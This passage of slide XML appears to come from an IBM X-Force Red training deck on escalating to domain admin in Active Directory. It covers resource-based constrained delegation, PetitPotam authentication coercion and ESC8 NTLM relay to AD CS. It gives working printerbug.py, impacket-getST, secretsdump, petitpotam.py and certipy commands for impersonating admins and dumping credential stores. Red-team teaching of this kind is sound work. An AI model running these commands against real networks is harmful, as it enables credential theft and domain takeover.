            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>python3 /opt/krbrelayx/printerbug.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>user:pass@target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> uniqueFakeRecord@80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>fakepath</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>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1257298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RBCD How To Continued</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62</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0" y="649792"/>
            <a:ext cx="8483829" cy="3844716"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Request a service ticket that will be used to impersonate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>daUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> on the remote host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>impacket-getST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>spn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>cifs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>remoteHost.domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -impersonate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>daUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>machineAccount:pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ccache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> file environment variable for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>export KRB5CCNAME=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>daUser.ccache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Dump all the things! (SAM, LSA, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>impacket-secretsdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -k -no-pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>remoteHost.domain.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Picture Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B94B258-A200-EE43-B915-D6FE18E2A804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972292" y="5483062"/>
            <a:ext cx="4566356" cy="5143500"/>
          </a:xfrm>
        </p:spPr>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4082115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359497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DA Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> &gt; Auth Coercion + ESC8</a:t>
            </a:r>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63</a:t>
            </a:fld>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2" name="Picture 12" descr="Auth-Coercion-ESC8-final.drawio(1).png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{050B0CCF-7FB5-582D-E239-618E93CA57B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386282" y="673627"/>
            <a:ext cx="5946745" cy="4116211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="634042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359497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DA Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Authentication Coercion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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64</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174194" y="756745"/>
            <a:ext cx="4486480" cy="3848127"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Microsoft Encrypting File System Remote Protocol (MS-EFSR): Remotely manage/encrypted information over the network using RPC.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>MS-EFSRPC Can be triggered without or with domain user cred:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Connect to the MS-EFSR service over the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>efsrpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>lsarpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>samr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>lsass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>netlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> named pipes with or without authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Send the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>EfsRpcOpenFileRaw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> command targeting your attacker device. This tells the domain controller to open up a encrypted file on your machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>The domain controller before opening the file attempts to authenticate to your attack machine by establishing a Net-NTLM authentication session with you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>python /opt/PetitPotam/petitpotam.py &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>yourIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>&gt; &lt;TARGET&gt; -pipe all</a:t>
            </a:r>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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 11" descr="Untitled Diagram.drawio.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0979F3DD-1C51-81F4-AA1B-ECA8C83A4F00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4715101" y="1888806"/>
            <a:ext cx="4182856" cy="1165767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1476270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 &gt; NTLM relay to AD CS HTTP Endpoints - ESC8</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65</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5"/>
            <a:ext cx="4156684" cy="3068210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>The certificate enrollment web interface hosted at http://&lt;ADCS_Server&gt;/certsrv/ is vulnerable to a Net-NTLM relay attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Relaying to the enrollment interface allows threat actors to login and then proceed to generate and obtain a certificate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>When PKINIT authentication is used, Kerberos provides the user with the NT hash of the account for fallback to Net-NTLM authentication. This is obtained through some Kerberos magic. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This means we can relay a privileged account to an AD CS http endpoint and obtain a certificate as that user, then proceed to authenticate using the certificate or even obtain the NT hash to pass the hash.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8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C36B9D-CF36-F243-B92B-DA967E394F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4934386" y="3339809"/>
            <a:ext cx="8628951" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0"/>
              <a:t>Image From - https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58790F91-8D6D-3D82-0D84-A0FEE278457F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1583368"/>
            <a:ext cx="4413793" cy="1723979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12483276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702690"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DA Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt; NTLM relay to AD CS HTTP Endpoints - ESC8 – How To</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a:t>IBM Security X-Force Red / © </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> IBM Corporation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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66</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202971" y="1037645"/>
            <a:ext cx="4809826" cy="3068210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up ESC8 relay with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> relay -ca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>caIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>DomainController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auth with your certificate!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> auth -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>dc.pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
